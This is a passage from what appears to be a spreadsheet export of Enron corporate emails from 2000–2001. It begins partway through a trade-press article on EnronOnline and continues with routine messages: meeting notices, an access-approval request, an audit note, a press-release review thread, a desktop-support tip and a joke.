space. "I think aspects of this have the potential to be very big," says _x000D_
Libby. "The carriers like the idea of instantaneous provisioning. And I think _x000D_
it has a lot of potential [for] . . . selling it to businesses and giving _x000D_
them the ability to cut their costs significantly by buying it as they need _x000D_
it." _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"We aspire to that kind of model," says Fred Buehler, director of electronic _x000D_
business at Eastman Chemical Co. in Kingsport, Tenn. _x000D_
"In every sector, there will be one or two innovators who get out front and _x000D_
do things differently to create shareholder value," Buehler says. "We're _x000D_
trying to be one of them." _x000D_
Market Maker _x000D_
Stroll through the gas-trading section on the 32nd floor of Enron's _x000D_
glistening 50-story headquarters, and the company's technological _x000D_
sophistication is immediately evident. Traders like 26-year-old John Arnold, _x000D_
who personally executes about $1 billion per day in trades, have real-time _x000D_
access to virtually any information that might affect their split-second _x000D_
buy-and-sell decisions. _x000D_
That information might be a meteorologist's prediction of a _x000D_
colder-than-normal winter across the Plains states or a live news report of _x000D_
political instability in an oil-producing country in the Middle East. _x000D_
Behind the scenes, all of Arnold's trades are instantly analyzed and _x000D_
processed by a sophisticated, proprietary risk-management system and then _x000D_
updated across multiple back-end computer systems worldwide. Less than a year _x000D_
after launching the operation, 60% of the world's gas is traded on _x000D_
EnronOnline. _x000D_
"What we are doing, no one in the industry did 10 years ago. Eighty percent _x000D_
of our income this year is from businesses that didn't exist 10 years ago," _x000D_
says Skilling. _x000D_
For example, EnronOnline contributed heavily to its parent company's _x000D_
third-quarter earnings, which were up 31% to $292 million, compared with the _x000D_
same period last year. _x000D_
"The change is technology-driven," Skilling adds. "We couldn't do what we do _x000D_
without massive amounts of computing capability." In this regard, Enron joins _x000D_
a short list of companies that includes Wal-Mart Stores Inc., FedEx Corp. and _x000D_
American Airlines Inc., which famously pioneered various mission-critical IT _x000D_
techniques to leapfrog competitors and create a whole new class of IT-enabled _x000D_
industry leaders. _x000D_
Among Enron's boldest ideas is its use of a single, powerful software-based _x000D_
trading platform to insert itself as a principal buyer or seller in hundreds _x000D_
of different markets. Currently, Enron trades more than 1,000 different _x000D_
commodities, such as gold, natural gas and metals, on EnronOnline. _x000D_
"The core of our business is our business model, which is a centralized _x000D_
risk-management and market-making business model. It just so happens that the _x000D_
Internet is just perfect for improving the efficiency of that model," _x000D_
Skilling says. _x000D_
But as a market maker, EnronOnline stands alone. For starters, unlike most _x000D_
other Internet marketplaces, it's free. There are no transaction fees or _x000D_
catalog, inventory or subscription costs for users. _x000D_
"Enron has broken away from the pack in the last year, in terms of their _x000D_
capital growth," says Ian Wylie, vice president of e-business at BP Amoco PLC _x000D_
in London. "And e-business is responsible for a lot of this change." _x000D_
Even more unusual is Enron's role as a principal in each transaction. That _x000D_
means Enron is either the buyer or seller in every trade in which it's _x000D_
involved, unlike market makers that simply act as matchmakers between buyers _x000D_
and sellers. _x000D_
In fact, Skilling, as well as Mike McConnell, who heads EnronOnline's global _x000D_
expansion efforts as president and CEO of Enron Global Markets LLC, dismisses _x000D_
much of the current hyperactivity surrounding other fee-based _x000D_
business-to-business exchanges as a flash in the pan. _x000D_
"[Many of the] B2B guys think all you have to do is set up a bulletin board _x000D_
and people will start transacting, but it doesn't work that way," Skilling _x000D_
says. "You need to know you can deliver if push comes to shove." _x000D_
As either the seller or buyer in all of its trades, Enron, an established _x000D_
brand name with 32,000 miles of pipeline and deep financial pockets, _x000D_
guarantees delivery or payment on all trades that are executed on _x000D_
EnronOnline. _x000D_
"We're creating markets that were highly illiquid, so someone has to put _x000D_
their reputation on the line to say, 'We'll deliver,' " Skilling says. _x000D_
But guaranteeing delivery also requires having guaranteed access to physical _x000D_
assets such as network bandwidth and papermaking plants. Guaranteed access _x000D_
also ensures marketplace liquidity. For Enron, this is where the bricks and _x000D_
mortar come in. _x000D_
For example, to help drive its liquidity in the pulp and paper market, Enron _x000D_
paid $72 million in July for Garden State Paper Co., a recycled-newsprint _x000D_
mill in Garfield, N.J. _x000D_
Skilling's current market fancy is metals, and in May, Enron bought MG PLC, a _x000D_
London-based metals marketer. "You have to break the liquidity logjam, and to _x000D_
do that, you have to take a risk position," Skilling says. _x000D_
But once the logjam is cleared, Enron is just as likely to sell off the _x000D_
brick-and-mortar assets it acquired and use the cash to invest in new _x000D_
business. _x000D_
For example, to finance its new bandwidth-trading operation, Enron is selling _x000D_
Portland General Electric Co., a Portland, Ore.-based power producer that it _x000D_
bought in 1997, so it could bring liquidity to and guarantee trades in the _x000D_
online electricity market. _x000D_
Eventually, Enron may end up trading commodities that aren't even considered _x000D_
commodities - at least not at the moment - such as data storage capacity or _x000D_
empty railcar space. _x000D_
"Might we move into sauces or meats or grains? Potentially," says McConnell, _x000D_
who was Enron's de facto CIO before moving into his current role. _x000D_
"You have to be creative every day," McConnell says. "You have to be _x000D_
open-minded to trying new things." _x000D_
But what remains constant throughout all the upsizing and downsizing is _x000D_
Enron's core IT-enabled business model, which is what puts it in a class of _x000D_
its own, analysts say. _x000D_
"People have talked a lot about systems that they're about to roll out, but _x000D_
there is just not much out there for direct trading," says Mike Heim, an _x000D_
energy analyst at A.G. Edwards &amp; Sons Inc. in St. Louis. "Enron rolled out _x000D_
its technology 10 months ago, and still there isn't much else out there. _x000D_
There hasn't been much competition [because] there isn't anybody in the same _x000D_
class." _x000D_
But just last month, Houston-based Dynegy Inc. launched Dynegydirect, an _x000D_
Internet-based, commission-free trading site for energy and communications _x000D_
commodities. _x000D_
Also last month, IntercontinentalExchange in Atlanta, whose partners include _x000D_
BP Amoco and The Hague-based Royal Dutch/Shell Group, added natural gas and _x000D_
power to its online trading system, which already included precious metals _x000D_
and crude oil. _x000D_
Skilling doesn't get called "nuts" much anymore. In fact, he's a darling on _x000D_
Wall Street, where Enron's stock has soared from around $40 per share last _x000D_
November to $81 as of this Nov. 2. As a result, Enron - by all accounts, an _x000D_
Old Economy gas pipeline company until 12 months ago - is widely regarded as _x000D_
a New Economy pioneer. _x000D_
Says Skilling, "We like to say we were B2B before there was B2B." _x000D_
_x000D_
Thriving On the Unconventional _x000D_
As head of two Enron pipeline subsidiaries, Mike McConnell knew a lot more _x000D_
about gas flows than he did about data flows last year when he got a surprise _x000D_
call from Enron President and Chief Operating Officer Jeff Skilling. _x000D_
Recalls McConnell, "Jeff went into this whole thought process about how the _x000D_
Internet is changing everything. He said, 'We need to make Enron an _x000D_
e-business, and I need a guy that can run this as a business. We need to _x000D_
change the way we view technology.' _x000D_
"I thought he was a little crazy and I said, 'Jeff, I'm not a technology _x000D_
person at all,' He said, 'No, seriously - this is going to be big.' So I took _x000D_
over as CEO of Enron Global Technology," and thus became the company's de _x000D_
facto CIO, McConnell explains. _x000D_
Appointing a person with no technology background to the top IT post is an _x000D_
unusual move. But Enron often defies convention and typically thrives as a _x000D_
result. Indeed, Enron boasts an entrepreneurial culture that's unusual in _x000D_
large, long-established companies, and in utilities firms in particular. _x000D_
McConnell relates the tale of how 29-year-old Louise Kitchen, Enron's head _x000D_
gas trader in Europe, spearheaded the creation of an online gas-trading _x000D_
system, recruiting IT people from elsewhere in the company to do the _x000D_
development work. Word of the Web-based platform, EnronOnline, which is _x000D_
literally remaking the company, didn't reach top management until a few weeks _x000D_
before it went live. _x000D_
Kitchen enlisted the support of Enron's initially skeptical top traders, and _x000D_
she scoured the company for software developers and other experts. Her small _x000D_
army of volunteers worked nights and weekends on the project while carrying _x000D_
on with their regular jobs. _x000D_
"It's an amazing story about not getting corporate approval and going through _x000D_
all the bureaucracy," McConnell says. "No one went to the board and said, 'We _x000D_
want to change the way we trade.' You just do it." _x000D_
Glowing Endorsement _x000D_
Soon after McConnell became the de facto CIO of the $40 billion energy _x000D_
company, he joined eight of Sun Microsystems Inc.'s top Houston customers at _x000D_
a breakfast hosted by Sun CEO Scott McNealy. _x000D_
"I was very nervous," recalls McConnell, 40. "I mean, McNealy is the guy, and _x000D_
here I know nothing about technology. I'd been on the job maybe two weeks." _x000D_
McNealy asked the attendees - all but McConnell were middle-aged CIOs with _x000D_
many years of IT experience - to introduce themselves in turn. _x000D_
"When Scott came to me, I said, 'I'm the CEO of Global Technology, and we _x000D_
want to be the leader in B2B commerce in the world.' He kind of sat back and _x000D_
said, 'How long have you been in the IT business?' " McConnell explains. " _x000D_
'About nine days,' I said, 'and we are going to take a little bit different _x000D_
approach to technology.' Scott chuckled and said, 'That sounds like Enron; it _x000D_
always looks at things differently.' He then stated that my CEO title and _x000D_
Enron's approach were very unusual but that it would be more commonplace _x000D_
soon, as this was the way of the future." _x000D_
McConnell says McNealy's endorsement had "a huge impact" on how he structured _x000D_
IT at Enron during the following year. _x000D_
"I realized that we weren't too late to change our approach and take a _x000D_
commercial view of technology," he says - a view of IT as an integral part of _x000D_
the business, not as something that supports business functions. "None of the _x000D_
other companies were thinking our new way at all." _x000D_
Taking a commercial view of IT has led to a blurring of the line that _x000D_
traditionally separates IT organizations from the business units they _x000D_
support. When McConnell became CEO of Global Technology, Enron had five CIOs _x000D_
who were predominantly operating independently inside the company's major _x000D_
lines of business. _x000D_
"Each CIO had his own agenda, his own thought process, his own goals, and _x000D_
they did not communicate at all," he says. _x000D_
McConnell established corporate standards for IT, created a management team _x000D_
that included the five CIOs and put all IT people under a new chief _x000D_
technology officer, Philippe Bibi. _x000D_
But IT is far from centralized at Enron. "We wanted to make people think _x000D_
about technology not as IT and support, but as an extension of your _x000D_
business," he explains. "So we seeded people out into the business units. _x000D_
[IT] directs the performance review process, but the business units have the _x000D_
greatest influence on where the person actually ranks and is rated." _x000D_
Firms like Enron that merge IT departments with the business units they serve _x000D_
will be the winners among fast-paced e-businesses, says IT organization _x000D_
expert Robert Zawacki, president of Zawacki and Associates in Colorado _x000D_
Springs and a professor emeritus at the University of Colorado, also in _x000D_
Colorado Springs. "We need more entrepreneurial leaders in IT, and _x000D_
[McConnell] is certainly one," he says. _x000D_
IT makes it easier to be entrepreneurial, says McConnell, who is now _x000D_
president and CEO of Enron Global Markets. "We really do like to try things _x000D_
and see what happens, and when you have an electronic platform like _x000D_
[EnronOnline] that we can model into different sectors, it's very inexpensive _x000D_
to try it. We are not afraid; if it's not working, we'll just stop." - Gary _x000D_
H. Anthes and Julia King _x000D_
_x000D_
_x000D_
_x000D_
						_x000D_
						_x000D_
						_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 27 Nov 2001 12:12:48 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Your message_x000D_
_x000D_
_x000D_
was delivered to the following recipient(s):_x000D_
_x000D_
Edmiston, John on Tue, 27 Nov 2001 15:12:42 -0500_x000D_
    MSEXCH:MSExchangeMTA:Dallas:DALMXSMB01_x000D_
_x000D_
_x000D_
 - C.DTF </t>
  </si>
  <si>
    <t>Mon, 2 Apr 2001 13:07:57 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Subic Power Corp. - Notice of 2001 Annual Shareholders' Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">Steph, I will not be able to attend this meeting.  Thank you._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Harris, Stephanie J  _x000D_
Sent:	Monday, April 02, 2001 7:59 AM_x000D_
To:	Derrick Jr., James_x000D_
Subject:	FW: Subic Power Corp. - Notice of 2001 Annual Shareholders' Meeting_x000D_
Importance:	High_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Angel.M.Esguerra@enron.com@ENRON &lt;mailto:Angel.M.Esguerra@enron.com@ENRON&gt; [mailto:IMCEANOTES-Angel+2EM+2EEsguerra+40enron+2Ecom+40ENRON@ENRON.com] &lt;mailto:[mailto:IMCEANOTES-Angel+2EM+2EEsguerra+40enron+2Ecom+40ENRON@ENRON.com]&gt; _x000D_
Sent:	Monday, April 02, 2001 5:00 PM_x000D_
To:	Harris, Stephanie J; Brown, Ann_x000D_
Cc:	Wilson, Frank_x000D_
Subject:	Subic Power Corp. - Notice of 2001 Annual Shareholders' Meeting_x000D_
Importance:	High_x000D_
_x000D_
_x000D_
To the Shareholders of  Subic Power Corp.:_x000D_
_x000D_
Please be notified that the annual meeting of the Shareholders of  Subic_x000D_
Power Corp. will be held on 25 April  2001 at 2:00 p.m. at the 3rd Floor_x000D_
Board Room, Shangri-La Hotel, Ayala Avenue, City of Makati, Metro Manila,_x000D_
Philippines.  The agenda of the meeting is as follows:_x000D_
_x000D_
   Certification of notice and quorum;_x000D_
   Approval of the minutes of the Shareholders' meeting held on 22 June_x000D_
   2000;_x000D_
   Appointment of External Auditors;_x000D_
   Ratification of acts and proceedings of the Board of Directors and_x000D_
   Officers;_x000D_
   Election of the Board of Directors; and_x000D_
   Approval of other matters as may properly come before the Shareholders._x000D_
_x000D_
If you cannot attend in person and wish to send a representative to the_x000D_
meeting, kindly submit to the undersigned (by fax to +632-813-7343) on or_x000D_
before the date of the meeting, a proxy substantially in the attached form._x000D_
_x000D_
Please be notified that the Board of Directors will hold a meeting_x000D_
immediately after the Shareholders' meeting._x000D_
_x000D_
_x000D_
Angel M. Esguerra_x000D_
Secretary_x000D_
2nd April 2001, Makati Cty, Metro Manila_x000D_
(See attached file: proxy.SPC.2001.doc)_x000D_
 - proxy.SPC.2001.doc &lt;&lt; File: proxy.SPC.2001.doc &gt;&gt; </t>
  </si>
  <si>
    <t>Mon, 19 Mar 2001 23:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jennifer_lamprecht@oxy.com', 'susan.hadix@elpaso.com'})</t>
  </si>
  <si>
    <t>trader joke</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Tori Kuykendall/HOU/ECT on 03/20/2001 _x000D_
07:53 AM ---------------------------_x000D_
From: Matthew Lenhart on 03/20/2001 07:20 AM_x000D_
To: Steven P South/HOU/ECT@ECT, Frank Ermis/HOU/ECT@ECT, Phillip K _x000D_
Allen/HOU/ECT@ECT, Mike Grigsby/HOU/ECT@ECT, Keith Holst/HOU/ECT@ect, Tori _x000D_
Kuykendall/HOU/ECT@ECT, Jane M Tholt/HOU/ECT@ECT, Monique _x000D_
Sanchez/HOU/ECT@ECT, Susan M Scott/HOU/ECT@ECT, Randall L Gay/HOU/ECT@ECT, _x000D_
Matt Smith/NA/Enron@ENRON, Eric Bass/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: trader joke_x000D_
_x000D_
_x000D_
_x000D_
A very successful energy trader parked his brand-new Mercedes in_x000D_
front of his_x000D_
office, ready to show it off to his colleagues. As he_x000D_
got out, a_x000D_
truck passed too close and completely tore off the_x000D_
door on the_x000D_
driver's side. The trader immediately grabbed his cell_x000D_
phone, dialed_x000D_
911, and within minutes a policeman pulled up._x000D_
_x000D_
Before the officer had a chance to ask any questions,_x000D_
the energy trading icon_x000D_
started screaming hysterically. His Mercedes, which he_x000D_
had just picked_x000D_
up the day before, was now completely ruined and would_x000D_
never be the_x000D_
same, no matter what the body shop did to it._x000D_
_x000D_
When he finally wound down from his ranting_x000D_
and raving, the_x000D_
officer shook his head in disgust and disbelief. "I_x000D_
can't believe how_x000D_
materialistic you energy traders are," he said. "You are so_x000D_
focused on your_x000D_
possessions that you don't notice anything else."_x000D_
_x000D_
"How can you say such a thing?" asked the trader._x000D_
_x000D_
The cop replied, "Don't you know that your left arm is_x000D_
missing from_x000D_
the elbow down? It must have been torn off when the_x000D_
truck hit you."_x000D_
_x000D_
"My God!" screamed the master trader. "Where's my Rolex?"_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 8 Feb 2000 07:27:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Financial Trade Blotter</t>
  </si>
  <si>
    <t>I'll need to go another time...already have a meeting.  I definitely want to _x000D_
see the demo._x000D_
_x000D_
Fletch</t>
  </si>
  <si>
    <t>Fri, 21 Jul 2000 08:44:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Office: Save As... responds very slowly when naming the file</t>
  </si>
  <si>
    <t xml:space="preserve">Debra Perlingiere_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron.com_x000D_
Phone 713-853-7658_x000D_
Fax  713-646-3490_x000D_
_x000D_
----- Forwarded by Debra Perlingiere/HOU/ECT on 07/21/2000 03:44 PM -----_x000D_
_x000D_
	Kathryn Franz@ENRON_x000D_
	07/21/2000 03:11 PM_x000D_
		 _x000D_
		 To: Debra Perlingiere/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Office: Save As... responds very slowly when naming the file_x000D_
_x000D_
Taffy, Debra:_x000D_
_x000D_
The instructions for fixing the Word saving problem are below. _x000D_
_x000D_
If you need me to do this, please open a ticket with the Resolution Center _x000D_
and then call me._x000D_
_x000D_
Thanks!_x000D_
_x000D_
===========================_x000D_
Kathy Franz_x000D_
Windows 2000 Desktop Support_x000D_
Enron Corporate - EB2254C_x000D_
kathryn.franz@enron.com_x000D_
713-345-4928 (voice)_x000D_
713-327-4709 (pager)_x000D_
_x000D_
----- Forwarded by Kathryn Franz/NA/Enron on 07/21/2000 03:06 PM -----_x000D_
_x000D_
_x000D_
	Office: Save As... responds very slowly when naming the file_x000D_
Mike Hernandez on 06/12 at 10:04 AM_x000D_
Category: Applications _x000D_
_x000D_
_x000D_
Problem: When a document is created or renamed using the Save As option under _x000D_
the File menu, the system responds very slowly when typing in a file name._x000D_
_x000D_
Cause: Office keeps a directory full of shortcuts to recently opened files.  _x000D_
As this directory gets larger, the problem starts to occur._x000D_
_x000D_
Resolution: Delete the h:\application data\microsoft\office\recent _x000D_
directory.  It will be re-created when the next file is saved.  Note: This is _x000D_
a workaround, as this directory will re-populate itself over time and the _x000D_
problem will resurface.  A long-term solution is being researched._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 27 Mar 2000 04:39:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'elisabeth.mccabe@enron.com'})</t>
  </si>
  <si>
    <t>Re: Vision and Values Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">I will be at the meeting on Thursday.  I have asked Brenda Herod to attend as _x000D_
well.  Can you add her to your distribution list so that she receives notice _x000D_
of these meetings as well?  That way, one or both of us will be able to _x000D_
attend.  Thanks.  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Elisabeth McCabe@ENRON_x000D_
03/22/2000 03:37 PM_x000D_
To: Brian Redmond/HOU/ECT@ECT, Tom Shelton/HOU/ECT@ECT, Renee _x000D_
Ingram/HOU/ECT@ECT, Billy Lemmons/Corp/Enron@ENRON, James I _x000D_
Ducote/HOU/ECT@ECT, Sally Beck/HOU/ECT@ECT, Brenda F Herod/HOU/ECT@ECT, _x000D_
Louise Kitchen/HOU/ECT@ECT, Valeria A Hope/HOU/ECT@ECT, Susan _x000D_
Runkel/HOU/ECT@ECT, Brad Blesie/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Dan _x000D_
Lyons/HOU/ECT@ECT, Scott Neal/HOU/ECT@ECT, Shelly Mansfield/HOU/ECT@ECT, Max _x000D_
Yzaguirre/NA/Enron@ENRON, John Enerson/HOU/ECT@ECT, Morris Richard _x000D_
Clark/HOU/ECT@ECT, Shannon Bedrich/Corp/Enron@Enron_x000D_
cc: Katherine Benedict/HOU/ECT@ECT, Michelle Vitrella/HOU/ECT@ECT _x000D_
Subject: Vision and Values Meeting_x000D_
_x000D_
An ENA Vision and Values committee meeting will be held on Thursday, March 30 _x000D_
at 2:30 p.m. in 47C2.  _x000D_
_x000D_
We will review the internal communications plan for 2000 and discuss the _x000D_
upcoming focus groups that are planned for ENA in April.  _x000D_
_x000D_
The meeting should last no longer than one hour.  Please plan to attend._x000D_
_x000D_
Thank you._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 8 Aug 2000 10:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Your approval is requested</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by John J Lavorato/Corp/Enron on 08/08/2000 _x000D_
05:32 PM ---------------------------_x000D_
_x000D_
From:  Information Risk Management/HOU/ECT_x000D_
_x000D_
Subject: Your approval is requested_x000D_
_x000D_
	Security Resource Request System	_x000D_
Application Approval		_x000D_
Please review and act upon this request. You have received this eMail because _x000D_
you are listed as an approver on the original request._x000D_
			Instructions	_x000D_
For: 	Paul T Lucci                   			_x000D_
Request	Original: 			_x000D_
Application Name:	EOL - NatGas US)			_x000D_
Request Type:	Grant			_x000D_
Role(s):	US GAS PHY FWD FIRM Non-Texas &lt; or = 1 Month, US GAS PHY FWD FIRM _x000D_
Non-Texas &gt; 1 Month &lt; 1 YEAR, US GAS PHY Index FIRM Non-Texas &lt; or = 1 Month, _x000D_
US GAS PHY Index FIRM Non-Texas &gt; 1 Month &lt; 1 YEAR			_x000D_
Comments:	execute rights		Review the request in the Request section at left._x000D_
			For more information regarding who the request is for, do the following:_x000D_
			Click on the name for PeopleFinder info_x000D_
			See the Further Information section below_x000D_
			In the Approval Section, select Approve or Reject, enter comments as _x000D_
necessary and click [Submit].	_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Further Information		_x000D_
	         		_x000D_
Requestor:			Paul T Lucci/DEN/ECT_x000D_
Manager:			_x000D_
Request Date:	08/08/2000 05:15:45 PM		_x000D_
RC #:	104503	WO #:	_x000D_
Company #:	0413	Priority:	Normal_x000D_
General Comments:			</t>
  </si>
  <si>
    <t>Wed, 3 Oct 2001 15:15:20 -0700 (PDT)</t>
  </si>
  <si>
    <t>US East and West Phy Power Audit</t>
  </si>
  <si>
    <t>Tana,_x000D_
 _x000D_
I have amended profiles for all the counterparties that had incorrect access to US Phy Power with the exception of the following:_x000D_
 _x000D_
Alcoa, Inc._x000D_
Diamond Shamrock Refining &amp; Marketing Co._x000D_
Dupont E.I. De Nemours and Company_x000D_
Duke Energy NGL Services, LLC_x000D_
Dynegy Liquids Marketing and Trade_x000D_
Gulf Canada Energy Partnership_x000D_
IMC Global Inc._x000D_
Louisiana Gas Service, Co._x000D_
Merek &amp; Co., Inc._x000D_
Minnesota Mining &amp;Manufacturing Company_x000D_
Motiva Enertprises LLC_x000D_
NStar Companies_x000D_
PPG Industries, Inc._x000D_
Public Service Company of Colorado (west only)_x000D_
Public Utility District #1 of Chelan County (west only)_x000D_
Public Utility District No. 1 of Benton County (west Only)_x000D_
Sacramento Municipal Utility District (west only)_x000D_
Southern Natural Gas Company_x000D_
Transcanada Power Mktg, Ltd._x000D_
Transwestern Pipeline Company_x000D_
United Parcel Service, Inc._x000D_
Unocal Energy Trading, Inc._x000D_
Wisconsin Power and Light Company_x000D_
Wisconsin Public Power Inc._x000D_
 _x000D_
The counterparties listed above have active users and need to have their profiles amended through Profile Manager for audit purposes.  Please let me know if you have any questions._x000D_
 _x000D_
Thanks,_x000D_
Stephanie</t>
  </si>
  <si>
    <t>Thu, 29 Mar 2001 00:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'erik.deadwyler@enron.com'})</t>
  </si>
  <si>
    <t>Re: one last visit</t>
  </si>
  <si>
    <t>any day next week is good</t>
  </si>
  <si>
    <t>Tue, 4 Sep 2001 19:48:47 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'stephen.veatch@enron.com', 'gina.taylor@enron.com', 'teb.lokey@enron.com', 'robert.kilmer@enron.com', 'eric.gadd@enron.com', 'gay.mayeux@enron.com', 'kevin.hyatt@enron.com', 'shelley.corman@enron.com', 'tony.pryor@enron.com', 'doug.cebryk@enron.com', 'd..martin@enron.com', 'danny.mccarty@enron.com'})</t>
  </si>
  <si>
    <t>RE: Draft 2 - TW Sun Devil Successful Open Season Press Release</t>
  </si>
  <si>
    <t>Eric,_x000D_
Of course, the answer is yes.  The consideration of potential impacts to "C=_x000D_
ultural Resources" is taken into account within the National Environmental =_x000D_
Protection Act (NEPA); therefore, to say TW is "commited" to environmental =_x000D_
stewardship would include that resource (although it is not generally under=_x000D_
stood that NEPA would include it).  On the other hand, you make a great poi=_x000D_
nt.  If you want to expand the TW's sensitive consideration with another se=_x000D_
ntence to include other interests at this point (e.g., interested parties, =_x000D_
landowners, regualtory bodies, etc.) that would be more reflective of the o=_x000D_
pen concept we want to portray with the Sun Devil Project.  As a suggestion=_x000D_
 you could probably say something to the effect that: "TW will consider sug=_x000D_
gestions and comments made by interested parties (e.g., environmental group=_x000D_
s, landowners, agencies and others) in the development of a potential route=_x000D_
 for the pipeline. This includes TW's commitment to develop the route in an=_x000D_
 environmentally sensitive manner."   John_x000D_
_x000D_
-----Original Message-----=20_x000D_
From: Gadd, Eric=20_x000D_
Sent: Tue 9/4/2001 6:30 PM=20_x000D_
To: Shafer, John; Taylor, Gina; Cebryk, Doug; Kilmer III, Robert; Hyatt, Ke=_x000D_
vin; Pryor, Tony; Lokey, Teb; McCarty, Danny; Martin, Jerry D.; Mayeux, Gay=_x000D_
; Corman, Shelley; Veatch, Stephen=20_x000D_
Cc: Haden, Sarah=20_x000D_
Subject: RE: Draft 2 - TW Sun Devil Successful Open Season Press Release_x000D_
_x000D_
_x000D_
_x000D_
I'm with John in spirit.  My concern is that you might be "excluding" other=_x000D_
 stakeholders by highlighting environmental stewardship (and not preservati=_x000D_
on of cultural heritage, etc.)  Can you generalize to "TW will initiate stu=_x000D_
dies to carefully consider routes/corridors in consultation with relevant p=_x000D_
arties, eg landowners, regulatory bodies, etc." ?=20_x000D_
_x000D_
 -----Original Message-----=20_x000D_
From:   Shafer, John =20_x000D_
Sent:   Tuesday, September 04, 2001 5:27 PM=20_x000D_
To:     Taylor, Gina; Cebryk, Doug; Kilmer III, Robert; Gadd, Eric; Hyatt, =_x000D_
Kevin; Pryor, Tony; Lokey, Teb; McCarty, Danny; Martin, Jerry D.; Mayeux, G=_x000D_
ay; Corman, Shelley; Veatch, Stephen_x000D_
_x000D_
Cc:     Haden, Sarah=20_x000D_
Subject:        RE: Draft 2 - TW Sun Devil Successful Open Season Press Rel=_x000D_
ease=20_x000D_
_x000D_
Gina,=20_x000D_
Being that about half of this project includes "greenfield" area that cross=_x000D_
 several sensitive watersheds, I have taken the liberty to offer a sentence=_x000D_
 that reflects the environmental stewardship commitment that TW is includin=_x000D_
g in its planning of the route for this line.  John Shafer_x000D_
_x000D_
_x000D_
 &lt;&lt; File: TW - Sun Devil Press Relase (Revised).doc &gt;&gt;=20_x000D_
_x000D_
 -----Original Message-----=20_x000D_
From:   Taylor, Gina =20_x000D_
Sent:   Tuesday, September 04, 2001 3:30 PM=20_x000D_
To:     Cebryk, Doug; Kilmer III, Robert; Gadd, Eric; Hyatt, Kevin; Pryor, =_x000D_
Tony; Lokey, Teb; Shafer, John; McCarty, Danny; Martin, Jerry D.; Mayeux, G=_x000D_
ay; Corman, Shelley; Veatch, Stephen_x000D_
_x000D_
Cc:     Haden, Sarah=20_x000D_
Subject:        Draft 2 - TW Sun Devil Successful Open Season Press Release=_x000D_
=20_x000D_
Importance:     High=20_x000D_
_x000D_
 &lt;&lt; File: TW - Sun Devil Press Relase results of  open season.doc &gt;&gt;=20_x000D_
_x000D_
Please review draft 2 of the Sun Devil press release.  Steve Harris' quotes=_x000D_
 changed and the q&amp;a has been added to the bottom of the release.  Please l=_x000D_
et me know what changes you have to Draft 2 by 10am, Wed., Sept. 5._x000D_
_x000D_
Draft 2 includes changes from Eric, Rob Kilmer and Kevin.  After I receive =_x000D_
your feedback, I will forward to Stan, and the Corp. PR folks for approval._x000D_
_x000D_
Thanks for your immediate attention.=20_x000D_
_x000D_
Gina=20_x000D_
x37681</t>
  </si>
  <si>
    <t>Thu, 1 Nov 2001 14:13:21 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lpinto@calpine.com'})</t>
  </si>
  <si>
    <t>here u go again</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;&lt;tracey &amp; lauren2.jpg&gt;&gt;  &lt;&lt;groupshot.jpg&gt;&gt;  &lt;&lt;ebony and ivory.2jpg.jpg&gt;&gt;_x000D_
_x000D_
 - tracey &amp; lauren2.jpg _x000D_
 - groupshot.jpg _x000D_
 - ebony and ivory.2jpg.jpg </t>
  </si>
  <si>
    <t>Fri, 22 Sep 2000 11:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sami.arap@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Reminder._x000D_
_x000D_
---------------------- Forwarded by Sami Arap/SA/Enron on 09/22/2000 06:40 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Sami Arap_x000D_
09/13/2000 11:57 AM_x000D_
To: Mark Taylor/HOU/ECT@ECT_x000D_
cc: Remi Collonges/SA/Enron@Enron, David Rosenberg/FGT/Enron@ENRON, Ricardo _x000D_
Lisboa/SA/Enron@Enron _x000D_
_x000D_
Subject: Re: EnronOnline_x000D_
_x000D_
_x000D_
	_x000D_
_x000D_
Mark;_x000D_
_x000D_
I've been working with Brazilian local outside counsel on this EOL matter and _x000D_
just had a meeting with Remi, David and Ricardo this morning.  For the _x000D_
purpose of finalizing the legal support (especially the review and _x000D_
"tropicalization" of the EOL agreements), I have a few questions for you:_x000D_
_x000D_
What entity owns the EOL site ?_x000D_
Will there be an agreement entered into between the entity that owns the EOL _x000D_
site and Enron Comercializadora de Energia Ltda. (and its designated _x000D_
branches) for the purpose of authorizing Enron Comercializadora de Energia _x000D_
Ltda. to use the EOL tool in Brazil ?_x000D_
For the purposes of doing business through the EOL tool, would Enron South _x000D_
America (and its designated affiliates) or ECE have to enter into the PA and _x000D_
the ETA with the entity that owns the EOL site ?_x000D_
_x000D_
Please note that I have only referred to ECE because I am working under the _x000D_
assumption that, at this point in time, we will only do power deals in _x000D_
Brazil.  In view of this and for regulatory reasons, the entity buying and _x000D_
